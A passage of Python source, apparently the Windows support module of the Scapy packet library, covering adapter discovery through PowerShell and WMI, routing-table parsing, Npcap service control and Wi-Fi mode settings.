cmd[0] in [\"Get-WmiObject\", \"Get-Service\"]):\n return\n action = cmd[0]\n fields = [_VBS_WMI_FIELDS.get(cmd[1], _VBS_WMI_FIELDS.get(\"*\", {})).get(fld, fld) for fld in fields]\n if IS_WINDOWS_XP:\n # On Windows XP, the Ampersand operator does not exist.\n # Using old method (which does not support missing parameters (e.g. WLAN interfaces))\n parsed_command = \"\\n \".join(\"WScript.Echo line.%s\" % fld for fld in fields if fld is not None)\n else:\n parsed_command = \"WScript.Echo \" + \" & \\\" @ \\\" & \".join(\"line.%s\" % fld for fld in fields if fld is not None)\n # The IPAddress is an array: convert it to a string\n for key, val in _VBS_WMI_REPLACE.get(cmd[1], {}).items():\n parsed_command = parsed_command.replace(key, val)\n if action == \"Get-WmiObject\":\n values = _vbs_exec_code(\"\"\"Set wmi = GetObject(\"winmgmts:\")\nSet lines = wmi.InstancesOf(\"%s\")\nOn Error Resume Next\nErr.clear\nFor Each line in lines\n %s\nNext\n\"\"\" % (cmd[1], parsed_command), \"@\")\n elif action == \"Get-Service\":\n values = _vbs_exec_code(\"\"\"serviceName = \"%s\"\nSet wmi = GetObject(\"winmgmts://./root/cimv2\")\nSet line = wmi.Get(\"Win32_Service.Name='\" & serviceName & \"'\")\n%s\n\"\"\" % (cmd[1], parsed_command), \"@\")\n\n while True:\n yield [None if fld is None else\n _VBS_WMI_OUTPUT.get(cmd[1], {}).get(fld, lambda x: x)(\n next(values).strip()\n )\n for fld in fields]\n\n\ndef exec_query(cmd, fields):\n \"\"\"Execute a system query using PowerShell if it is available, and\n using VBS/cscript as a fallback.\n\n \"\"\"\n if conf.prog.powershell is None:\n return _exec_query_vbs(cmd, fields)\n return _exec_query_ps(cmd, fields)\n\n\ndef _where(filename, dirs=None, env=\"PATH\"):\n \"\"\"Find file in current dir, in deep_lookup cache or in system path\"\"\"\n if dirs is None:\n dirs = []\n if not isinstance(dirs, list):\n dirs = [dirs]\n if glob(filename):\n return filename\n paths = [os.curdir] + os.environ[env].split(os.path.pathsep) + dirs\n try:\n return next(os.path.normpath(match)\n for path in paths\n for match in glob(os.path.join(path, filename))\n if match)\n except StopIteration:\n raise IOError(\"File not found: %s\" % filename)\n\n\ndef win_find_exe(filename, installsubdir=None, env=\"ProgramFiles\"):\n \"\"\"Find executable in current dir, system path or given ProgramFiles subdir\"\"\"\n fns = [filename] if filename.endswith(\".exe\") else [filename + \".exe\", filename]\n for fn in fns:\n try:\n if installsubdir is None:\n path = _where(fn)\n else:\n path = _where(fn, dirs=[os.path.join(os.environ[env], installsubdir)])\n except IOError:\n path = None\n else:\n break\n return path\n\n\nclass WinProgPath(ConfClass):\n _default = \"<System default>\"\n\n def __init__(self):\n self._reload()\n\n def _reload(self):\n self.pdfreader = None\n self.psreader = None\n # We try some magic to find the appropriate executables\n self.dot = win_find_exe(\"dot\")\n self.tcpdump = win_find_exe(\"windump\")\n self.tshark = win_find_exe(\"tshark\")\n self.tcpreplay = win_find_exe(\"tcpreplay\")\n self.display = self._default\n self.hexedit = win_find_exe(\"hexer\")\n self.sox = win_find_exe(\"sox\")\n self.wireshark = win_find_exe(\"wireshark\", \"wireshark\")\n self.powershell = win_find_exe(\n \"powershell\",\n installsubdir=\"System32\\\\WindowsPowerShell\\\\v1.0\",\n env=\"SystemRoot\"\n )\n self.cscript = win_find_exe(\"cscript\", installsubdir=\"System32\",\n env=\"SystemRoot\")\n self.cmd = win_find_exe(\"cmd\", installsubdir=\"System32\",\n env=\"SystemRoot\")\n if self.wireshark:\n try:\n manu_path = load_manuf(os.path.sep.join(self.wireshark.split(os.path.sep)[:-1]) + os.path.sep + \"manuf\")\n except (IOError, OSError): # FileNotFoundError not available on Py2 - using OSError\n log_loading.warning(\"Wireshark is installed, but cannot read manuf !\")\n manu_path = None\n scapy.data.MANUFDB = conf.manufdb = manu_path\n\n self.os_access = (self.powershell is not None) or (self.cscript is not None)\n\n\nconf.prog = WinProgPath()\nif not conf.prog.os_access:\n warning(\"Scapy did not detect powershell and cscript ! Routes, interfaces and much more won't work !\")\n\nif conf.prog.tcpdump and conf.use_npcap and conf.prog.os_access:\n def test_windump_npcap():\n \"\"\"Return wether windump version is correct or not\"\"\"\n try:\n p_test_windump = sp.Popen([conf.prog.tcpdump, \"-help\"], stdout=sp.PIPE, stderr=sp.STDOUT)\n stdout, err = p_test_windump.communicate()\n _windows_title()\n _output = stdout.lower()\n return b\"npcap\" in _output and b\"winpcap\" not in _output\n except:\n return False\n windump_ok = test_windump_npcap()\n if not windump_ok:\n warning(\"The installed Windump version does not work with Npcap ! Refer to 'Winpcap/Npcap conflicts' in scapy's doc\")\n del windump_ok\n\n\nclass PcapNameNotFoundError(Scapy_Exception):\n pass\n\n\ndef _validate_interface(iface):\n if \"guid\" in iface and iface[\"guid\"]:\n # Fix '-' instead of ':'\n if \"mac\" in iface:\n iface[\"mac\"] = iface[\"mac\"].replace(\"-\", \":\")\n # Potentially, the default Microsoft KM-TEST would have been translated\n if \"name\" in iface:\n if \"KM-TEST\" in iface[\"name\"] and iface[\"name\"] != scapy.consts.LOOPBACK_NAME:\n scapy.consts.LOOPBACK_NAME = iface[\"name\"]\n return True\n return False\n\n\ndef get_windows_if_list():\n \"\"\"Returns windows interfaces.\"\"\"\n if not conf.prog.os_access:\n return []\n if is_new_release():\n # This works only starting from Windows 8/2012 and up. For older Windows another solution is needed\n # Careful: this is weird, but Get-NetAdaptater works like: (Name isn't the interface name)\n # Name InterfaceDescription ifIndex Status MacAddress LinkSpeed\n # ---- -------------------- ------- ------ ---------- ---------\n # Ethernet Killer E2200 Gigabit Ethernet Contro... 13 Up D0-50-99-56-DD-F9 1 Gbps\n query = exec_query(['Get-NetAdapter'],\n ['InterfaceDescription', 'InterfaceIndex', 'Name',\n 'InterfaceGuid', 'MacAddress', 'InterfaceAlias']) # It is normal that it is in this order\n else:\n query = exec_query(['Get-WmiObject', 'Win32_NetworkAdapter'],\n ['Name', 'InterfaceIndex', 'InterfaceDescription',\n 'GUID', 'MacAddress', 'NetConnectionID'])\n return [\n iface for iface in\n (dict(zip(['name', 'win_index', 'description', 'guid', 'mac', 'netid'], line))\n for line in query)\n if _validate_interface(iface)\n ]\n\n\ndef get_ips(v6=False):\n \"\"\"Returns all available IPs matching to interfaces, using the windows system.\n Should only be used as a WinPcapy fallback.\"\"\"\n res = {}\n for descr, ipaddr in exec_query(['Get-WmiObject',\n 'Win32_NetworkAdapterConfiguration'],\n ['Description', 'IPAddress']):\n if ipaddr.strip():\n res[descr] = ipaddr.split(\",\", 1)[v6].strip('{}').strip()\n return res\n\n\ndef get_ip_from_name(ifname, v6=False):\n \"\"\"Backward compatibility: indirectly calls get_ips\n Deprecated.\"\"\"\n return get_ips(v6=v6).get(ifname, \"\")\n\n\nclass NetworkInterface(object):\n \"\"\"A network interface of your local host\"\"\"\n\n def __init__(self, data=None):\n self.name = None\n self.ip = None\n self.mac = None\n self.pcap_name = None\n self.description = None\n self.data = data\n self.invalid = False\n self.raw80211 = None\n if data is not None:\n self.update(data)\n\n def update(self, data):\n \"\"\"Update info about network interface according to given dnet dictionary\"\"\"\n if 'netid' in data and data['netid'] == scapy.consts.LOOPBACK_NAME:\n # Force LOOPBACK_NAME: Some Windows systems overwrite 'name'\n self.name = scapy.consts.LOOPBACK_NAME\n else:\n self.name = data['name']\n self.description = data['description']\n self.win_index = data['win_index']\n self.guid = data['guid']\n if 'invalid' in data:\n self.invalid = data['invalid']\n # Other attributes are optional\n self._update_pcapdata()\n\n try:\n # Npcap loopback interface\n if self.name == scapy.consts.LOOPBACK_NAME and conf.use_npcap:\n # https://nmap.org/npcap/guide/npcap-devguide.html\n self.mac = \"00:00:00:00:00:00\"\n self.ip = \"127.0.0.1\"\n conf.cache_ipaddrs[self.pcap_name] = socket.inet_aton(self.ip)\n return\n else:\n self.mac = data['mac']\n except KeyError:\n pass\n\n try:\n self.ip = socket.inet_ntoa(get_if_raw_addr(self))\n except (TypeError, NameError):\n pass\n\n try:\n # Windows native loopback interface\n if not self.ip and self.name == scapy.consts.LOOPBACK_NAME:\n self.ip = \"127.0.0.1\"\n conf.cache_ipaddrs[self.pcap_name] = socket.inet_aton(self.ip)\n except (KeyError, AttributeError, NameError) as e:\n print(e)\n\n def _update_pcapdata(self):\n if self.is_invalid():\n return\n for i in get_if_list():\n if i.endswith(self.data['guid']):\n self.pcap_name = i\n return\n\n raise PcapNameNotFoundError\n\n def is_invalid(self):\n return self.invalid\n\n def _check_npcap_requirement(self):\n if not conf.use_npcap:\n raise OSError(\"This operation requires Npcap.\")\n if self.raw80211 is None:\n # This checks if npcap has Dot11 enabled and if the interface is compatible,\n # by looking for the npcap/Parameters/Dot11Adapters key in the registry.\n dot11adapters = _get_npcap_dot11_adapters()\n self.raw80211 = (dot11adapters is not None and\n ((\"\\\\Device\\\\\" + self.guid).lower() in dot11adapters.lower()))\n if not self.raw80211:\n raise Scapy_Exception(\"This interface does not support raw 802.11\")\n\n def mode(self):\n \"\"\"Get the interface operation mode.\n Only available with Npcap.\"\"\"\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"mode\"], crp=False, rst_t=True)[0].strip()\n\n def ismonitor(self):\n \"\"\"Returns True if the interface is in monitor mode.\n Only available with Npcap.\"\"\"\n try:\n return self.mode() == \"monitor\"\n except Scapy_Exception:\n return False\n\n def setmonitor(self, enable=True):\n \"\"\"Alias for setmode('monitor') or setmode('managed')\n Only availble with Npcap\"\"\"\n if enable:\n return self.setmode('monitor')\n else:\n return self.setmode('managed')\n\n def availablemodes(self):\n \"\"\"Get all available interface modes.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modes\"], crp=False, rst_t=True)[0].split(\",\")\n\n def setmode(self, mode):\n \"\"\"Set the interface mode. It can be:\n - 0 or managed: Managed Mode (aka \"Extensible Station Mode\")\n - 1 or monitor: Monitor Mode (aka \"Network Monitor Mode\")\n - 2 or master: Master Mode (aka \"Extensible Access Point\") (supported from Windows 7 and later)\n - 3 or wfd_device: The Wi-Fi Direct Device operation mode (supported from Windows 8 and later)\n - 4 or wfd_owner: The Wi-Fi Direct Group Owner operation mode (supported from Windows 8 and later)\n - 5 or wfd_client: The Wi-Fi Direct Client operation mode (supported from Windows 8 and later)\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n _modes = {\n 0: \"managed\",\n 1: \"monitor\",\n 2: \"master\",\n 3: \"wfd_device\",\n 4: \"wfd_owner\",\n 5: \"wfd_client\"\n }\n m = _modes.get(mode, \"unknown\") if isinstance(mode, int) else mode\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" mode \" + m)], rst_t=True)\n\n def channel(self):\n \"\"\"Get the channel of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n x = POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"channel\"],\n crp=False)[0].strip()\n return int(x)\n\n def setchannel(self, channel):\n \"\"\"Set the channel of the interface (1-14):\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" channel \" + str(channel))],\n rst_t=True)\n\n def frequence(self):\n \"\"\"Get the frequence of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n x = POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"freq\"], crp=False, rst_t=True)[0].strip()\n return int(x)\n\n def setfrequence(self, freq):\n \"\"\"Set the channel of the interface (1-14):\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" freq \" + str(freq))],\n rst_t=True)\n\n def availablemodulations(self):\n \"\"\"Get all available 802.11 interface modulations.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modus\"], crp=False, rst_t=True)[0].strip().split(\",\")\n\n def modulation(self):\n \"\"\"Get the 802.11 modulation of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modu\"], crp=False, rst_t=True)[0].strip()\n\n def setmodulation(self, modu):\n \"\"\"Set the interface modulation. It can be:\n - 0: dsss\n - 1: fhss\n - 2: irbaseband\n - 3: ofdm\n - 4: hrdss\n - 5: erp\n - 6: ht\n - 7: vht\n - 8: ihv\n - 9: mimo-ofdm\n - 10: mimo-ofdm\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n _modus = {\n 0: \"dsss\",\n 1: \"fhss\",\n 2: \"irbaseband\",\n 3: \"ofdm\",\n 4: \"hrdss\",\n 5: \"erp\",\n 6: \"ht\",\n 7: \"vht\",\n 8: \"ihv\",\n 9: \"mimo-ofdm\",\n 10: \"mimo-ofdm\",\n }\n m = _modus.get(modu, \"unknown\") if isinstance(modu, int) else modu\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" mode \" + m)],\n rst_t=True)\n\n def __repr__(self):\n return \"<%s %s %s>\" % (self.__class__.__name__, self.name, self.guid)\n\n\ndef pcap_service_name():\n \"\"\"Return the pcap adapter service's name\"\"\"\n return \"npcap\" if conf.use_npcap else \"npf\"\n\n\ndef pcap_service_status():\n \"\"\"Returns a tuple (name, description, started) of the windows pcap adapter\"\"\"\n for i in exec_query(['Get-Service', pcap_service_name()], ['Name', 'DisplayName', 'Status']):\n name = i[0]\n description = i[1]\n started = (i[2].lower().strip() == 'running')\n if name == pcap_service_name():\n return (name, description, started)\n return (None, None, None)\n\n\ndef pcap_service_control(action, askadmin=True):\n \"\"\"Util to run pcap control command\"\"\"\n if not conf.prog.powershell:\n return False\n command = action + ' ' + pcap_service_name()\n stdout = POWERSHELL_PROCESS.query([_encapsulate_admin(command) if askadmin else command])\n return \"error\" not in \"\".join(stdout).lower()\n\n\ndef pcap_service_start(askadmin=True):\n \"\"\"Starts the pcap adapter. Will ask for admin. Returns True if success\"\"\"\n return pcap_service_control('Start-Service', askadmin=askadmin)\n\n\ndef pcap_service_stop(askadmin=True):\n \"\"\"Stops the pcap adapter. Will ask for admin. Returns True if success\"\"\"\n return pcap_service_control('Stop-Service', askadmin=askadmin)\n\n\nfrom scapy.modules.six.moves import UserDict\n\n\nclass NetworkInterfaceDict(UserDict):\n \"\"\"Store information about network interfaces and convert between names\"\"\"\n\n def load_from_powershell(self):\n if not conf.prog.os_access:\n return\n ifaces_ips = None\n for i in get_windows_if_list():\n try:\n interface = NetworkInterface(i)\n self.data[interface.guid] = interface\n # If no IP address was detected using winpcap and if\n # the interface is not the loopback one, look for\n # internal windows interfaces\n if not interface.ip:\n if not ifaces_ips: # ifaces_ips is used as a cache\n ifaces_ips = get_ips()\n # If it exists, retrieve the interface's IP from the cache\n interface.ip = ifaces_ips.get(interface.name, \"\")\n except (KeyError, PcapNameNotFoundError):\n pass\n\n if not self.data and conf.use_winpcapy:\n _detect = pcap_service_status()\n\n def _ask_user():\n if not conf.interactive:\n return False\n while True:\n _confir = input(\"Do you want to start it ? (yes/no) [y]: \").lower().strip()\n if _confir in [\"yes\", \"y\", \"\"]:\n return True\n elif _confir in [\"no\", \"n\"]:\n return False\n return False\n _error_msg = \"No match between your pcap and windows network interfaces found. \"\n if _detect[0] and not _detect[2] and not (hasattr(self, \"restarted_adapter\") and self.restarted_adapter):\n warning(\"Scapy has detected that your pcap service is not running !\")\n if not conf.interactive or _ask_user():\n succeed = pcap_service_start(askadmin=conf.interactive)\n self.restarted_adapter = True\n if succeed:\n log_loading.info(\"Pcap service started !\")\n self.load_from_powershell()\n return\n _error_msg = \"Could not start the pcap service ! \"\n warning(_error_msg +\n \"You probably won't be able to send packets. \"\n \"Deactivating unneeded interfaces and restarting Scapy might help. \"\n \"Check your winpcap and powershell installation, and access rights.\")\n else:\n # Loading state: remove invalid interfaces\n self.remove_invalid_ifaces()\n # Replace LOOPBACK_INTERFACE\n try:\n scapy.consts.LOOPBACK_INTERFACE = self.dev_from_name(\n scapy.consts.LOOPBACK_NAME,\n )\n except:\n pass\n\n def dev_from_name(self, name):\n \"\"\"Return the first pcap device name for a given Windows\n device name.\n \"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.name == name)\n except StopIteration:\n raise ValueError(\"Unknown network interface %r\" % name)\n\n def dev_from_pcapname(self, pcap_name):\n \"\"\"Return Windows device name for given pcap device name.\"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.pcap_name == pcap_name)\n except StopIteration:\n raise ValueError(\"Unknown pypcap network interface %r\" % pcap_name)\n\n def dev_from_index(self, if_index):\n \"\"\"Return interface name from interface index\"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.win_index == str(if_index))\n except StopIteration:\n if str(if_index) == \"1\":\n # Test if the loopback interface is set up\n if isinstance(scapy.consts.LOOPBACK_INTERFACE, NetworkInterface):\n return scapy.consts.LOOPBACK_INTERFACE\n raise ValueError(\"Unknown network interface index %r\" % if_index)\n\n def remove_invalid_ifaces(self):\n \"\"\"Remove all invalid interfaces\"\"\"\n for devname in list(self.keys()):\n iface = self.data[devname]\n if iface.is_invalid():\n self.data.pop(devname)\n\n def reload(self):\n \"\"\"Reload interface list\"\"\"\n self.restarted_adapter = False\n self.data.clear()\n self.load_from_powershell()\n\n def show(self, resolve_mac=True, print_result=True):\n \"\"\"Print list of available network interfaces in human readable form\"\"\"\n res = []\n for iface_name in sorted(self.data):\n dev = self.data[iface_name]\n mac = dev.mac\n if resolve_mac and conf.manufdb:\n mac = conf.manufdb._resolve_MAC(mac)\n res.append((str(dev.win_index), str(dev.name), str(dev.ip), mac))\n\n res = pretty_list(res, [(\"INDEX\", \"IFACE\", \"IP\", \"MAC\")])\n if print_result:\n print(res)\n else:\n return res\n\n def __repr__(self):\n return self.show(print_result=False)\n\n\n# Init POWERSHELL_PROCESS\nPOWERSHELL_PROCESS = _PowershellManager()\n\nIFACES = ifaces = NetworkInterfaceDict()\nIFACES.load_from_powershell()\n\n\ndef pcapname(dev):\n \"\"\"Return pypcap device name for given interface or libdnet/Scapy\n device name.\n\n \"\"\"\n if isinstance(dev, NetworkInterface):\n if dev.is_invalid():\n return None\n return dev.pcap_name\n try:\n return IFACES.dev_from_name(dev).pcap_name\n except ValueError:\n if conf.use_pcap:\n # pcap.pcap() will choose a sensible default for sniffing if\n # iface=None\n return None\n raise\n\n\ndef dev_from_pcapname(pcap_name):\n \"\"\"Return libdnet/Scapy device name for given pypcap device name\"\"\"\n return IFACES.dev_from_pcapname(pcap_name)\n\n\ndef dev_from_index(if_index):\n \"\"\"Return Windows adapter name for given Windows interface index\"\"\"\n return IFACES.dev_from_index(if_index)\n\n\ndef show_interfaces(resolve_mac=True):\n \"\"\"Print list of available network interfaces\"\"\"\n return IFACES.show(resolve_mac)\n\n\n_orig_open_pcap = pcapdnet.open_pcap\n\n\ndef open_pcap(iface, *args, **kargs):\n \"\"\"open_pcap: Windows routine for creating a pcap from an interface.\n This function is also responsible for detecting monitor mode.\n \"\"\"\n iface_pcap_name = pcapname(iface)\n if not isinstance(iface, NetworkInterface) and iface_pcap_name is not None:\n iface = IFACES.dev_from_name(iface)\n if conf.use_npcap and isinstance(iface, NetworkInterface):\n monitored = iface.ismonitor()\n kw_monitor = kargs.get(\"monitor\", None)\n if kw_monitor is None:\n # The monitor param is not specified. Matching it to current state\n kargs[\"monitor\"] = monitored\n elif kw_monitor is not monitored:\n # The monitor param is specified, and not matching the current\n # interface state\n iface.setmonitor(kw_monitor)\n return _orig_open_pcap(iface_pcap_name, *args, **kargs)\n\n\npcapdnet.open_pcap = open_pcap\n\nget_if_raw_hwaddr = pcapdnet.get_if_raw_hwaddr = lambda iface, *args, **kargs: (\n ARPHDR_ETHER, mac2str(IFACES.dev_from_pcapname(pcapname(iface)).mac)\n)\n\n\ndef _read_routes_xp():\n # The InterfaceIndex in Win32_IP4RouteTable does not match the\n # InterfaceIndex in Win32_NetworkAdapter under some platforms\n # (namely Windows XP): let's try an IP association\n routes = []\n partial_routes = []\n # map local IP addresses to interfaces\n local_addresses = {iface.ip: iface for iface in six.itervalues(IFACES)}\n iface_indexes = {}\n for line in exec_query(['Get-WmiObject', 'Win32_IP4RouteTable'],\n ['Name', 'Mask', 'NextHop', 'InterfaceIndex', 'Metric1']):\n if line[2] in local_addresses:\n iface = local_addresses[line[2]]\n # This gives us an association InterfaceIndex <-> interface\n iface_indexes[line[3]] = iface\n routes.append((atol(line[0]), atol(line[1]), \"0.0.0.0\", iface,\n iface.ip, int(line[4])))\n else:\n partial_routes.append((atol(line[0]), atol(line[1]), line[2],\n line[3], int(line[4])))\n for dst, mask, gw, ifidx, metric in partial_routes:\n if ifidx in iface_indexes:\n iface = iface_indexes[ifidx]\n routes.append((dst, mask, gw, iface, iface.ip, metric))\n return routes\n\n\ndef _read_routes_7():\n routes = []\n for line in exec_query(['Get-WmiObject', 'Win32_IP4RouteTable'],\n ['Name', 'Mask', 'NextHop', 'InterfaceIndex', 'Metric1']):\n try:\n iface = dev_from_index(line[3])\n ip = \"127.0.0.1\" if line[3] == \"1\" else iface.ip # Force loopback on iface 1\n routes.append((atol(line[0]), atol(line[1]), line[2], iface, ip, int(line[4])))\n except ValueError:\n continue\n return routes\n\n\ndef read_routes():\n routes = []\n if not conf.prog.os_access:\n return routes\n release = platform.release()\n try:\n if is_new_release():\n routes = _read_routes_post2008()\n elif release == \"XP\":\n routes = _read_routes_xp()\n else:\n routes = _read_routes_7()\n except Exception as e:\n warning(\"Error building scapy IPv4 routing table : %s\", e)\n else:\n if not routes:\n warning(\"No default IPv4 routes found. Your Windows release may no be supported and you have to enter your routes manually\")\n return routes\n\n\ndef _get_metrics(ipv6=False):\n \"\"\"Returns a dict containing all IPv4 or IPv6 interfaces' metric,\n ordered by their interface index.\n \"\"\"\n query_cmd = \"netsh interface \" + (\"ipv6\" if ipv6 else \"ipv4\") + \" show interfaces level=verbose\"\n stdout = POWERSHELL_PROCESS.query([query_cmd])\n res = {}\n _buffer = []\n _pattern = re.compile(\".*:\\s+(\\d+)\")\n for _line in stdout:\n if not _line.strip() and len(_buffer) > 0:\n if_index = re.search(_pattern, _buffer[3]).group(1)\n if_metric = int(re.search(_pattern, _buffer[5]).group(1))\n res[if_index] = if_metric\n _buffer = []\n else:\n _buffer.append(_line)\n return res\n\n\ndef _read_routes_post2008():\n routes = []\n if4_metrics = None\n # This works only starting from Windows 8/2012 and up. For older Windows another solution is needed\n # Get-NetRoute -AddressFamily IPV4 | select ifIndex, DestinationPrefix, NextHop, RouteMetric, InterfaceMetric | fl\n for line in exec_query(['Get-NetRoute', '-AddressFamily IPV4'], ['ifIndex', 'DestinationPrefix', 'NextHop', 'RouteMetric', 'InterfaceMetric']):\n try:\n iface = dev_from_index(line[0])\n if iface.ip == \"0.0.0.0\":\n continue\n except:\n continue\n # try:\n # intf = pcapdnet.dnet.intf().get_dst(pcapdnet.dnet.addr(type=2, addrtxt=dest))\n # except OSError:\n # log_loading.warning(\"Building Scapy's routing table: Couldn't get outgoing interface for destination %s\", dest)\n # continue\n dest, mask = line[1].split('/')\n ip = \"127.0.0.1\" if line[0] == \"1\" else iface.ip # Force loopback on iface 1\n if not line[4].strip(): # InterfaceMetric is not available. Load it from netsh\n if not if4_metrics:\n if4_metrics = _get_metrics()\n metric = int(line[3]) + if4_metrics.get(iface.win_index, 0) # RouteMetric + InterfaceMetric\n else:\n metric = int(line[3]) + int(line[4]) # RouteMetric + InterfaceMetric\n routes.append((atol(dest), itom(int(mask)),\n line[2], iface, ip, metric))\n return routes\n\n############\n# IPv6 #\n############\n\n\ndef in6_getifaddr():\n \"\"\"\n Returns all IPv6 addresses found on the computer\n \"\"\"\n ifaddrs = []\n for ifaddr in in6_getifaddr_raw():\n try:\n ifaddrs.append((ifaddr[0], ifaddr[1], dev_from_pcapname(ifaddr[2])))\n except ValueError:\n pass\n # Appends Npcap loopback if available\n if conf.use_npcap and scapy.consts.LOOPBACK_INTERFACE:\n ifaddrs.append((\"::1\", 0, scapy.consts.LOOPBACK_INTERFACE))\n return ifaddrs\n\n\ndef _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric):\n cset = [] # candidate set (possible source addresses)\n if iface.name == scapy.consts.LOOPBACK_NAME:\n if dpref == '::':\n return\n cset = ['::1']\n else:\n devaddrs = (x for x in lifaddr if x[2] == iface)\n cset = construct_source_candidate_set(dpref, dp, devaddrs)\n if not cset:\n return\n # APPEND (DESTINATION, NETMASK, NEXT HOP, IFACE, CANDIDATS, METRIC)\n routes.append((dpref, dp, nh, iface, cset, metric))\n\n\ndef _read_routes6_post2008():\n routes6 = []\n if6_metrics = None\n # This works only starting from Windows 8/2012 and up. For older Windows another solution is needed\n # Get-NetRoute -AddressFamily IPV6 | select ifIndex, DestinationPrefix, NextHop | fl\n lifaddr = in6_getifaddr()\n for line in exec_query(['Get-NetRoute', '-AddressFamily IPV6'], ['ifIndex', 'DestinationPrefix', 'NextHop', 'RouteMetric', 'InterfaceMetric']):\n try:\n if_index = line[0]\n iface = dev_from_index(if_index)\n except:\n continue\n\n dpref, dp = line[1].split('/')\n dp = int(dp)\n nh = line[2]\n if not line[4].strip(): # InterfaceMetric is not available. Load it from netsh\n if not if6_metrics:\n if6_metrics = _get_metrics(ipv6=True)\n metric = int(line[3]) + if6_metrics.get(iface.win_index, 0) # RouteMetric + InterfaceMetric\n else:\n metric = int(line[3]) + int(line[4]) # RouteMetric + InterfaceMetric\n\n _append_route6(routes6, dpref, dp, nh, iface, lifaddr, metric)\n return routes6\n\n\ndef _read_routes6_7():\n # Not supported in powershell, we have to use netsh\n routes = []\n query_cmd = \"netsh interface ipv6 show route level=verbose\"\n stdout = POWERSHELL_PROCESS.query([query_cmd])\n lifaddr = in6_getifaddr()\n if6_metrics = _get_metrics(ipv6=True)\n # Define regexes\n r_int = [\".*:\\s+(\\d+)\"]\n r_all = [\"(.*)\"]\n r_ipv6 = [\".*:\\s+([A-z|0-9|:]+(\\/\\d+)?)\"]\n # Build regex list for each object\n regex_list = r_ipv6 * 2 + r_int + r_all * 3 + r_int + r_all * 3\n current_object = []\n index = 0\n for l in stdout:\n if not l.strip():\n if not current_object:\n continue\n\n if len(current_object) == len(regex_list):\n try:\n if_index = current_object[2]\n iface = dev_from_index(if_index)\n except:\n current_object = []\n index = 0\n continue\n _ip = current_object[0].split(\"/\")\n dpref = _ip[0]\n dp = int(_ip[1])\n _match = re.search(r_ipv6[0], current_object[3])\n nh = \"::\"\n if _match: # Detect if Next Hop is specified (if not, it will be the IFName)\n _nhg1 = _match.group(1)\n nh = _nhg1 if re.match(\".*:.*:.*\", _nhg1) else \"::\"\n metric = int(current_object[6]) + if6_metrics.get(if_index, 0)\n _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric)\n\n # Reset current object\n current_object = []\n index = 0\n else:\n pattern = re.compile(regex_list[index])\n match = re.search(pattern, l)\n if match:\n current_object.append(match.group(1))\n index = index + 1\n return routes\n\n\ndef read_routes6():\n routes6 = []\n if not conf.prog.os_access:\n return routes6\n try:\n # Interface metrics have been added to powershell in win10+\n if is_new_release():\n routes6 = _read_routes6_post2008()\n else:\n routes6 = _read_routes6_7()\n except Exception as e:\n warning(\"Error building scapy IPv6 routing table : %s\", e)\n return routes6\n\n\ndef get_working_if():\n try:\n # return the interface associated with the route with smallest\n # mask (route by default if it exists)\n return min(conf.route.routes, key=lambda x: x[1])[3]\n except ValueError:\n # no route\n return scapy.consts.LOOPBACK_INTERFACE\n\n\ndef _get_valid_guid():\n if scapy.consts.LOOPBACK_INTERFACE:\n return scapy.consts.LOOPBACK_INTERFACE.guid\n else:\n return next((i.guid for i in six.itervalues(IFACES)\n if not i.is_invalid()), None)\n\n\ndef route_add_loopback(routes=None, ipv6=False, iflist=None):\n \"\"\"Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows\"\"\"\n if not WINDOWS:\n warning(\"Not available\")\n return\n warning(\"This will completly mess up the routes. Testing purpose only !\")\n # Add only if some adpaters already exist\n if ipv6:\n if not conf.route6.routes:\n return\n else:\n if not conf.route.routes:\n return\n data = {\n 'name': scapy.consts.LOOPBACK_NAME,\n 'description': \"Loopback\",\n 'win_index': -1,\n 'guid': _get_valid_guid(),\n 'invalid': False,\n 'mac': '00:00:00:00:00:00',\n }\n data['pcap_name'] = six.text_type(\"\\\\Device\\\\NPF_\" + data['guid'])\n adapter = NetworkInterface(data)\n adapter.ip = \"127.0.0.1\"\n if iflist:\n iflist.append(adapter.pcap_name)\n return\n # Remove all LOOPBACK_NAME routes\n for route in list(conf.route.routes):\n iface = route[3]\n if iface.name == scapy.consts.LOOPBACK_NAME:\n conf.route.routes.remove(route)\n # Remove 